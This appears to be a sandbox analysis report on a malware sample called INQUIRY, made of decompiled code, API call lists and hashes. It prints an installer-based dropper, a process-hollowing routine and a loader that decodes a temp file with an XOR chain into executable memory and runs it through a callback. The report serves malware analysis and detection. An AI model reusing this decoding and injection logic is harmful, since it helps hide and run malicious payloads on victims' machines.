                          					_t41 = E0040575C(0x409b68, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                          					__eflags = _t41 - 0xffffffff;
                          					 *(_t85 - 0x34) = _t41;
                          					if(_t41 != 0xffffffff) {
                          						break;
                          					}
                          					__eflags =  *(_t85 + 8) - _t75;
                          					if( *(_t85 + 8) != _t75) {
                          						E00404E23(0xffffffe2,  *(_t85 - 8));
                          						__eflags =  *(_t85 + 8) - 2;
                          						if(__eflags == 0) {
                          							 *((intOrPtr*)(_t85 - 4)) = 1;
                          						}
                          						L31:
                          						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t85 - 4));
                          						__eflags =  *0x423f28;
                          						goto L32;
                          					} else {
                          						E00405A85(0x40a368, 0x424000);
                          						E00405A85(0x424000, 0x409b68);
                          						E00405AA7(_t75, 0x40a368, 0x409b68, "C:\Users\jones\AppData\Local\Temp\nsc48D6.tmp\gerys.dll",  *((intOrPtr*)(_t85 - 0x10)));
                          						E00405A85(0x424000, 0x40a368);
                          						_t62 = E00405346("C:\Users\jones\AppData\Local\Temp\nsc48D6.tmp\gerys.dll",  *(_t85 - 0x24) >> 3) - 4;
                          						__eflags = _t62;
                          						if(_t62 == 0) {
                          							continue;
                          						} else {
                          							__eflags = _t62 == 1;
                          							if(_t62 == 1) {
                          								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
                          								L32:
                          								_t49 = 0;
                          								__eflags = 0;
                          							} else {
                          								_push(0x409b68);
                          								_push(0xfffffffa);
                          								E00404E23();
                          								L29:
                          								_t49 = 0x7fffffff;
                          							}
                          						}
                          					}
                          					L33:
                          					return _t49;
                          				}
                          				E00404E23(0xffffffea,  *(_t85 - 8));
                          				 *0x423f54 =  *0x423f54 + 1;
                          				_t43 = E00402F01(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
                          				 *0x423f54 =  *0x423f54 - 1;
                          				__eflags =  *(_t85 - 0x18) - 0xffffffff;
                          				_t80 = _t43;
                          				if( *(_t85 - 0x18) != 0xffffffff) {
                          					L22:
                          					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
                          				} else {
                          					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
                          					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
                          						goto L22;
                          					}
                          				}
                          				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
                          				__eflags = _t80 - _t75;
                          				if(_t80 >= _t75) {
                          					goto L31;
                          				} else {
                          					__eflags = _t80 - 0xfffffffe;
                          					if(_t80 != 0xfffffffe) {
                          						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffee);
                          					} else {
                          						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffe9);
                          						lstrcatA(0x409b68,  *(_t85 - 8));
                          					}
                          					_push(0x200010);
                          					_push(0x409b68);
                          					E00405346();
                          					goto L29;
                          				}
                          				goto L33;
                          			}
















                          0x00401734
                          0x0040173b
                          0x00401744
                          0x00401747
                          0x0040174a
                          0x0040174f
                          0x00401757
                          0x00401773
                          0x00401759
                          0x00401759
                          0x0040175a
                          0x0040175a
                          0x00401779
                          0x00401783
                          0x00401783
                          0x00401787
                          0x0040178a
                          0x0040178f
                          0x00401791
                          0x00401793
                          0x00401798
                          0x00401798
                          0x004017a3
                          0x004017a3
                          0x004017b4
                          0x004017b6
                          0x004017b6
                          0x004017b7
                          0x004017b7
                          0x004017ba
                          0x004017bd
                          0x004017c0
                          0x004017c0
                          0x004017c7
                          0x004017d6
                          0x004017db
                          0x004017de
                          0x004017e1
                          0x00000000
                          0x00000000
                          0x004017e3
                          0x004017e6
                          0x00401840
                          0x00401845
                          0x004015a8
                          0x0040264e
                          0x0040264e
                          0x0040287d
                          0x00402880
                          0x00402880
                          0x00000000
                          0x004017e8
                          0x004017ee
                          0x004017f9
                          0x00401806
                          0x00401811
                          0x00401827
                          0x00401827
                          0x0040182a
                          0x00000000
                          0x00401830
                          0x00401830
                          0x00401831
                          0x0040184e
                          0x00402886
                          0x00402886
                          0x00402886
                          0x00401833
                          0x00401833
                          0x00401834
                          0x00401492
                          0x00402200
                          0x00402200
                          0x00402200
                          0x00401831
                          0x0040182a
                          0x00402888
                          0x0040288c
                          0x0040288c
                          0x0040185e
                          0x00401863
                          0x00401871
                          0x00401876
                          0x0040187c
                          0x00401880
                          0x00401882
                          0x0040188a
                          0x00401896
                          0x00401884
                          0x00401884
                          0x00401888
                          0x00000000
                          0x00000000
                          0x00401888
                          0x0040189f
                          0x004018a5
                          0x004018a7
                          0x00000000
                          0x004018ad
                          0x004018ad
                          0x004018b0
                          0x004018c8
                          0x004018b2
                          0x004018b5
                          0x004018be
                          0x004018be
                          0x004018cd
                          0x004018d2
                          0x004021fb
                          0x00000000
                          0x004021fb
                          0x00000000

                          APIs
                          • lstrcatA.KERNEL32(00000000,00000000,xzfdi,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                          • CompareFileTime.KERNEL32(-00000014,?,xzfdi,xzfdi,00000000,00000000,xzfdi,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                            • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,heifsmlbdxlebvytfzg Setup,NSIS Error), ref: 00405A92
                            • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                            • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                            • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                            • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                            • Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                            • Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                            • Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                          • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsc48D6.tmp$C:\Users\user\AppData\Local\Temp\nsc48D6.tmp\gerys.dll$xzfdi
                          • API String ID: 1941528284-4273405806
                          • Opcode ID: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
                          • Instruction ID: c3a7f6530b99602e8ac3371ca3d410005e8cb954db153f1edc9c693d5e31c606
                          • Opcode Fuzzy Hash: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
                          • Instruction Fuzzy Hash: 4541AD31A00515BACB10BBB5DD86DAF3679EF45369B20433BF511B20E1D77C8A418EAE
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 385 21a12cf-21a137d call 21a06c7 call 21a0776 * 7 402 21a1380-21a1384 385->402 403 21a139c-21a13a9 402->403 404 21a1386-21a139a 402->404 405 21a13ac-21a13b0 403->405 404->402 406 21a13c8-21a13e4 405->406 407 21a13b2-21a13c6 405->407 409 21a13ee-21a1418 CreateProcessW 406->409 410 21a13e6-21a13e9 406->410 407->405 413 21a141a-21a141d 409->413 414 21a1422-21a143b GetThreadContext 409->414 411 21a1591-21a1594 410->411 413->411 415 21a143d-21a1440 414->415 416 21a1445-21a145f ReadProcessMemory 414->416 415->411 417 21a1469-21a1472 416->417 418 21a1461-21a1464 416->418 419 21a149c-21a14bc VirtualAllocEx 417->419 420 21a1474-21a1483 417->420 418->411 422 21a14be-21a14c1 419->422 423 21a14c6-21a14de call 21a0267 419->423 420->419 421 21a1485-21a148b call 21a0368 420->421 427 21a1490-21a1492 421->427 422->411 428 21a14e8-21a14ec 423->428 429 21a14e0-21a14e3 423->429 427->419 430 21a1494-21a1497 427->430 431 21a14f5-21a14ff 428->431 429->411 430->411 432 21a1501-21a152f call 21a0267 431->432 433 21a1536-21a1552 call 21a0267 431->433 436 21a1534 432->436 439 21a1559-21a1577 SetThreadContext 433->439 440 21a1554-21a1557 433->440 436->431 441 21a1579-21a157c 439->441 442 21a157e-21a1581 call 21a01b6 439->442 440->411 441->411 444 21a1586-21a1588 442->444 445 21a158a-21a158d 444->445 446 21a158f 444->446 445->411 446->411
                          APIs
                          • CreateProcessW.KERNELBASE(?,00000000), ref: 021A1413
                          • GetThreadContext.KERNELBASE(?,00010007), ref: 021A1436
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.665372685.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_21a0000_INQUIRY.jbxd
                          Similarity
                          • API ID: ContextCreateProcessThread
                          • String ID: D
                          • API String ID: 2843130473-2746444292
                          • Opcode ID: 8e0a9e1c2e75e26a36b0cdfcf6ac1189901bfd8e6856da1315c331a422d3e505
                          • Instruction ID: 609b923e1378839f3afc4f8ad8ff1c90480d573974309d42306922ba6857777d
                          • Opcode Fuzzy Hash: 8e0a9e1c2e75e26a36b0cdfcf6ac1189901bfd8e6856da1315c331a422d3e505
                          • Instruction Fuzzy Hash: B2A1F678E40219EFDF54DFA4C990BAEBBBAEF09344F104465E51AEB250D734AA41CF10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 497 21a1b9b-21a1c93 call 21a06c7 call 21a0776 * 8 PathFileExistsW 517 21a1ca2-21a1cc1 CreateFileW 497->517 518 21a1c95-21a1c98 497->518 520 21a1cca-21a1cd9 517->520 521 21a1cc3-21a1cc5 517->521 519 21a1d6a-21a1d6d 518->519 523 21a1cdb-21a1cdd 520->523 524 21a1ce2-21a1cfc VirtualAlloc 520->524 521->519 523->519 525 21a1cfe-21a1d00 524->525 526 21a1d02-21a1d16 ReadFile 524->526 525->519 527 21a1d18-21a1d1a 526->527 528 21a1d1c-21a1d55 FindCloseChangeNotification CreateFileW WriteFile 526->528 527->519 529 21a1d61-21a1d69 528->529 530 21a1d57-21a1d5f 528->530 529->519 530->519
                          APIs
                          • PathFileExistsW.KERNELBASE(00000000), ref: 021A1C8D
                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 021A1CB7
                          Memory Dump Source
                          • Source File: 00000001.00000002.665372685.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_21a0000_INQUIRY.jbxd
                          Similarity
                          • API ID: File$CreateExistsPath
                          • String ID:
                          • API String ID: 2955419453-0
                          • Opcode ID: 09d735061d9a87763cc2f46a30dfb1df1471e6a71715cf91d87135949ec5cdd4
                          • Instruction ID: d9ed0e96ef26dfe79dbe8a88d6fe9fd122fdb817cd6628124c92aa0f2eff0d94
                          • Opcode Fuzzy Hash: 09d735061d9a87763cc2f46a30dfb1df1471e6a71715cf91d87135949ec5cdd4
                          • Instruction Fuzzy Hash: FE512438E90208BFDF20DBE0D915BAEBBB6AF08751F208415E515FA2A0E7714A41DF04
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 533 402f01-402f10 534 402f12-402f28 SetFilePointer 533->534 535 402f2e-402f39 call 40302c 533->535 534->535 538 403025-403029 535->538 539 402f3f-402f59 ReadFile 535->539 540 403022 539->540 541 402f5f-402f62 539->541 543 403024 540->543 541->540 542 402f68-402f7b call 40302c 541->542 542->538 546 402f81-402f84 542->546 543->538 547 402ff1-402ff7 546->547 548 402f86-402f89 546->548 549 402ff9 547->549 550 402ffc-40300f ReadFile 547->550 551 40301d-403020 548->551 552 402f8f 548->552 549->550 550->540 553 403011-40301a 550->553 551->538 554 402f94-402f9c 552->554 553->551 555 402fa1-402fb3 ReadFile 554->555 556 402f9e 554->556 555->540 557 402fb5-402fb8 555->557 556->555 557->540 558 402fba-402fcf WriteFile 557->558 559 402fd1-402fd4 558->559 560 402fed-402fef 558->560 559->560 561 402fd6-402fe9 559->561 560->543 561->554 562 402feb 561->562 562->551
                          C-Code - Quality: 93%
                          			E00402F01(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
                          				long _v8;
                          				intOrPtr _v12;
                          				void _t31;
                          				intOrPtr _t32;
                          				int _t35;
                          				long _t36;
                          				int _t37;
                          				long _t38;
                          				int _t40;
                          				int _t42;
                          				long _t43;
                          				long _t44;
                          				intOrPtr _t51;
                          				long _t55;
                          				long _t57;
                          
                          				_t31 = _a4;
                          				if(_t31 >= 0) {
                          					_t51 =  *0x423ef8; // 0x5c89
                          					_t44 = _t31 + _t51;
                          					 *0x41703c = _t44;
                          					SetFilePointer( *0x409014, _t44, 0, 0); // executed
                          				}
                          				_t57 = 4;
                          				_t32 = E0040302C(_t57);
                          				if(_t32 >= 0) {
                          					_t35 = ReadFile( *0x409014,  &_a4, _t57,  &_v8, 0); // executed
                          					if(_t35 == 0 || _v8 != _t57) {
                          						L23:
                          						_push(0xfffffffd);
                          						goto L24;
                          					} else {
                          						 *0x41703c =  *0x41703c + _t57;
                          						_t32 = E0040302C(_a4);
                          						_v12 = _t32;
                          						if(_t32 >= 0) {
                          							if(_a12 != 0) {
                          								_t36 = _a4;
                          								if(_t36 >= _a16) {
                          									_t36 = _a16;
                          								}
                          								_t37 = ReadFile( *0x409014, _a12, _t36,  &_v8, 0); // executed
                          								if(_t37 == 0) {
                          									goto L23;
                          								} else {
                          									_t38 = _v8;
                          									 *0x41703c =  *0x41703c + _t38;
                          									_v12 = _t38;
                          									goto L22;
                          								}
                          							} else {
                          								if(_a4 <= 0) {
                          									L22:
                          									_t32 = _v12;
                          								} else {
                          									while(1) {
                          										_t55 = 0x4000;
                          										if(_a4 < 0x4000) {
                          											_t55 = _a4;
                          										}
                          										_t40 = ReadFile( *0x409014, 0x413038, _t55,  &_v8, 0); // executed
                          										if(_t40 == 0 || _t55 != _v8) {
                          											goto L23;
                          										}
                          										_t42 = WriteFile(_a8, 0x413038, _v8,  &_a16, 0); // executed
                          										if(_t42 == 0 || _a16 != _t55) {
                          											_push(0xfffffffe);
                          											L24:
                          											_pop(_t32);
                          										} else {
                          											_t43 = _v8;
                          											_v12 = _v12 + _t43;
                          											_a4 = _a4 - _t43;
                          											 *0x41703c =  *0x41703c + _t43;
                          											if(_a4 > 0) {
                          												continue;
                          											} else {
                          												goto L22;
                          											}
                          										}
                          										goto L25;
                          									}
                          									goto L23;
                          								}
                          							}
                          						}
                          					}
                          				}
                          				L25:
                          				return _t32;
                          			}


















                          0x00402f06
                          0x00402f10
                          0x00402f12
                          0x00402f19
                          0x00402f1d
                          0x00402f28
                          0x00402f28
                          0x00402f30
                          0x00402f32
                          0x00402f39
                          0x00402f55
                          0x00402f59
                          0x00403022
                          0x00403022
                          0x00000000
                          0x00402f68
                          0x00402f6b
                          0x00402f71
                          0x00402f78
                          0x00402f7b
                          0x00402f84
                          0x00402ff1
                          0x00402ff7
                          0x00402ff9
                          0x00402ff9
                          0x0040300b
                          0x0040300f
                          0x00000000
                          0x00403011
                          0x00403011
                          0x00403014
                          0x0040301a
                          0x00000000
                          0x0040301a
                          0x00402f86
                          0x00402f89
                          0x0040301d
                          0x0040301d
                          0x00402f8f
                          0x00402f94
                          0x00402f94
                          0x00402f9c
                          0x00402f9e
                          0x00402f9e
                          0x00402faf
                          0x00402fb3
                          0x00000000
                          0x00000000
                          0x00402fc7
                          0x00402fcf
                          0x00402fed
                          0x00403024
                          0x00403024
                          0x00402fd6
                          0x00402fd6
                          0x00402fd9
                          0x00402fdc
                          0x00402fdf
                          0x00402fe9
                          0x00000000
                          0x00402feb
                          0x00000000
                          0x00402feb
                          0x00402fe9
                          0x00000000
                          0x00402fcf
                          0x00000000
                          0x00402f94
                          0x00402f89
                          0x00402f84
                          0x00402f7b
                          0x00402f59
                          0x00403025
                          0x00403029

                          APIs
                          • SetFilePointer.KERNELBASE(00409128,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128,0000B5E4), ref: 00402F28
                          • ReadFile.KERNELBASE(00409128,00000004,0000B5E4,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128), ref: 00402F55
                          • ReadFile.KERNELBASE(00413038,00004000,0000B5E4,00000000,00409128,?,00402EAD,000000FF,00000000,00000000,00409128,0000B5E4), ref: 00402FAF
                          • WriteFile.KERNELBASE(00000000,00413038,0000B5E4,000000FF,00000000,?,00402EAD,000000FF,00000000,00000000,00409128,0000B5E4), ref: 00402FC7
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: File$Read$PointerWrite
                          • String ID: 80A
                          • API String ID: 2113905535-195308239
                          • Opcode ID: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
                          • Instruction ID: 41b23491bffeaa1753be022b97a7ffae9df7beca0cc47644b0b6bde15745b2e9
                          • Opcode Fuzzy Hash: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
                          • Instruction Fuzzy Hash: 91310B31901209EFDF21CF55DE84DAE7BB8EB453A5F20403AF504E61E0D2749E41EB69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 563 40302c-403055 GetTickCount 564 403196-40319e call 402bc5 563->564 565 40305b-403086 call 4031da SetFilePointer 563->565 570 4031a0-4031a5 564->570 571 40308b-40309d 565->571 572 4030a1-4030af call 4031a8 571->572 573 40309f 571->573 576 4030b5-4030c1 572->576 577 403188-40318b 572->577 573->572 578 4030c7-4030cd 576->578 577->570 579 4030f8-403114 call 405e9d 578->579 580 4030cf-4030d5 578->580 585 403191 579->585 586 403116-40311e 579->586 580->579 582 4030d7-4030f7 call 402bc5 580->582 582->579 590 403193-403194 585->590 588 403120-403136 WriteFile 586->588 589 403152-403158 586->589 591 403138-40313c 588->591 592 40318d-40318f 588->592 589->585 593 40315a-40315c 589->593 590->570 591->592 594 40313e-40314a 591->594 592->590 593->585 595 40315e-403171 593->595 594->578 596 403150 594->596 595->571 597 403177-403186 SetFilePointer 595->597 596->595 597->564
                          C-Code - Quality: 94%
                          			E0040302C(intOrPtr _a4) {
                          				long _v4;
                          				void* __ecx;
                          				intOrPtr _t12;
                          				intOrPtr _t13;
                          				signed int _t14;
                          				void* _t16;
                          				void* _t17;
                          				long _t18;
                          				int _t21;
                          				intOrPtr _t22;
                          				intOrPtr _t34;
                          				long _t35;
                          				intOrPtr _t37;
                          				void* _t39;
                          				long _t40;
                          				intOrPtr _t46;
                          				intOrPtr _t47;
                          				intOrPtr _t53;
                          
                          				_t35 =  *0x41703c; // 0x50207
                          				_t37 = _t35 -  *0x40afa8 + _a4;
                          				 *0x423eac = GetTickCount() + 0x1f4;
                          				if(_t37 <= 0) {
                          					L23:
                          					E00402BC5(1);
                          					return 0;
                          				}
                          				E004031DA( *0x41f04c);
                          				SetFilePointer( *0x409014,  *0x40afa8, 0, 0); // executed
                          				 *0x41f048 = _t37;
                          				 *0x417038 = 0;
                          				while(1) {
                          					L2:
                          					_t12 =  *0x417040; // 0x4cef1
                          					_t34 = 0x4000;
                          					_t13 = _t12 -  *0x41f04c;
                          					if(_t13 <= 0x4000) {
                          						_t34 = _t13;
                          					}
                          					_t14 = E004031A8(0x413038, _t34); // executed
                          					if(_t14 == 0) {
                          						break;
                          					}
                          					 *0x41f04c =  *0x41f04c + _t34;
                          					 *0x40afc8 = 0x413038;
                          					 *0x40afcc = _t34;
                          					while(1) {
                          						_t46 =  *0x423eb0; // 0x51d818
                          						if(_t46 != 0) {
                          							_t47 =  *0x423f40; // 0x0
                          							if(_t47 == 0) {
                          								_t22 =  *0x41f048; // 0x32d2
                          								 *0x417038 = _t22 -  *0x41703c - _a4 +  *0x40afa8;
                          								E00402BC5(0);
                          							}
                          						}
                          						 *0x40afd0 = 0x40b038;
                          						 *0x40afd4 = 0x8000; // executed
                          						_t16 = E00405E9D(0x40afb0); // executed
                          						if(_t16 < 0) {
                          							break;
                          						}
                          						_t39 =  *0x40afd0; // 0x40e30a
                          						_t40 = _t39 - 0x40b038;
                          						if(_t40 == 0) {
                          							__eflags =  *0x40afcc; // 0x0
                          							if(__eflags != 0) {
                          								break;
                          							}
                          							__eflags = _t34;
                          							if(_t34 == 0) {
                          								break;
                          							}
                          							L17:
                          							_t18 =  *0x41703c; // 0x50207
                          							if(_t18 -  *0x40afa8 + _a4 > 0) {
                          								goto L2;
                          							}
                          							SetFilePointer( *0x409014, _t18, 0, 0); // executed
                          							goto L23;
                          						}
                          						_t21 = WriteFile( *0x409014, 0x40b038, _t40,  &_v4, 0); // executed
                          						if(_t21 == 0 || _t40 != _v4) {
                          							_push(0xfffffffe);
                          							L22:
                          							_pop(_t17);
                          							return _t17;
                          						} else {
                          							 *0x40afa8 =  *0x40afa8 + _t40;
                          							_t53 =  *0x40afcc; // 0x0
                          							if(_t53 != 0) {
                          								continue;
                          							}
                          							goto L17;
                          						}
                          					}
                          					_push(0xfffffffd);
                          					goto L22;
                          				}
                          				return _t14 | 0xffffffff;
                          			}





















                          0x00403030
                          0x0040303d
                          0x00403050
                          0x00403055
                          0x00403196
                          0x00403198
                          0x00000000
                          0x0040319e
                          0x00403061
                          0x00403074
                          0x0040307a
                          0x00403080
                          0x0040308b
                          0x0040308b
                          0x0040308b
                          0x00403090
                          0x00403095
                          0x0040309d
                          0x0040309f
                          0x0040309f
                          0x004030a8
                          0x004030af
                          0x00000000
                          0x00000000
                          0x004030b5
                          0x004030bb
                          0x004030c1
                          0x004030c7
                          0x004030c7
                          0x004030cd
                          0x004030cf
                          0x004030d5
                          0x004030d7
                          0x004030ed
                          0x004030f2
                          0x004030f7
                          0x004030d5
                          0x004030fd
                          0x00403103
                          0x0040310d
                          0x00403114
                          0x00000000
                          0x00000000
                          0x00403116
                          0x0040311c
                          0x0040311e
                          0x00403152
                          0x00403158
                          0x00000000
                          0x00000000
                          0x0040315a
                          0x0040315c
                          0x00000000
                          0x00000000
                          0x0040315e
                          0x0040315e
                          0x00403171
                          0x00000000
                          0x00000000
                          0x00403180
                          0x00000000
                          0x00403180
                          0x0040312e
                          0x00403136
                          0x0040318d
                          0x00403193
                          0x00403193
                          0x00000000
                          0x0040313e
                          0x0040313e
                          0x00403144
                          0x0040314a
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403150
                          0x00403136
                          0x00403191
                          0x00000000
                          0x00403191
                          0x00000000

                          APIs
                          • GetTickCount.KERNEL32 ref: 00403041
                            • Part of subcall function 004031DA: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,0000B5E4), ref: 004031E8
                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000), ref: 00403074
                          • WriteFile.KERNELBASE(0040B038,0040E30A,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 0040312E
                          • SetFilePointer.KERNELBASE(00050207,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 00403180
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID: File$Pointer$CountTickWrite
                          • String ID: @$80A
                          • API String ID: 2146148272-3673687522
                          • Opcode ID: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
                          • Instruction ID: 8653c145dc750015188d6a9afa30315cb9c5a6a6900809742879fa1bd1138a56
                          • Opcode Fuzzy Hash: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
                          • Instruction Fuzzy Hash: 74417FB2504302AFD7109F19EE8496A3FBCF748396710813BE511B62F1C7386A559BAE
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 97%
                          			E728B1070(void* __ebx) {
                          				long _v8;
                          				void* _v12;
                          				long _v16;
                          				void* _v20;
                          				short _v22;
                          				short _v24;
                          				short _v26;
                          				short _v28;
                          				short _v30;
                          				short _v32;
                          				short _v34;
                          				short _v36;
                          				short _v38;
                          				char _v40;
                          				long _v44;
                          				short _v1084;
                          				void* _t97;
                          				void* _t100;
                          				signed int _t104;
                          				void* _t106;
                          				void* _t137;
                          				_Unknown_base(*)()* _t149;
                          				long _t187;
                          
                          				_t137 = __ebx;
                          				_push(__ebx);
                          				_v40 = 0x74;
                          				_v38 = 0x61;
                          				_v36 = 0x75;
                          				_v34 = 0x64;
                          				_v32 = 0x6f;
                          				_v30 = 0x73;
                          				_v28 = 0x77;
                          				_v26 = 0x79;
                          				_v24 = 0x6f;
                          				_v22 = 0;
                          				GetTempPathW(0x103,  &_v1084);
                          				E728B1000( &_v1084,  &_v40);
                          				_t97 = CreateFileW( &_v1084, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                          				_v20 = _t97;
                          				_v16 = GetFileSize(_v20, 0);
                          				_t100 = VirtualAlloc(0, _v16, 0x3000, 0x40); // executed
                          				_v12 = _t100;
                          				_t187 = _v16;
                          				ReadFile(_v20, _v12, _t187,  &_v44, 0); // executed
                          				_v8 = 0;
                          				while(_v8 < _v16) {
                          					 *(_v12 + _v8) = ( *(_v12 + _v8) & 0x000000ff) + 0x35;
                          					 *(_v12 + _v8) = ( *(_v12 + _v8) & 0x000000ff) - 0xac;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x00000072;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x00000090;
                          					 *(_v12 + _v8) = ( *(_v12 + _v8) & 0x000000ff) - 0x21;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
                          					 *(_v12 + _v8) = ( *(_v12 + _v8) & 0x000000ff) - 0xaf;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x000000e5;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) + 1;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x000000cb;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) & 0x000000ff ^ 0x00000061;
                          					 *(_v12 + _v8) =  *(_v12 + _v8) - 1;
                          					_t187 = _v8 + 1;
                          					_v8 = _t187;
                          				}
                          				_t149 = _v12;
                          				_t104 = EnumResourceTypesA(0, _t149, 0); // executed
                          				_t106 = (_t104 ^ 0x0000620a) + 0x16054;
                          				if(_t137 + 0xb33a != 0x12f4f) {
                          					_t106 = _t106 + 0x17ef8;
                          					_t187 = _t187 - 1;
                          					_t149 = _t149 + 1;
                          				}
                          				return _t106;
                          			}


























                          0x728b1070
                          0x728b1079
                          0x728b107f
                          0x728b1088
                          0x728b1091
                          0x728b109a
                          0x728b10a3
                          0x728b10ac
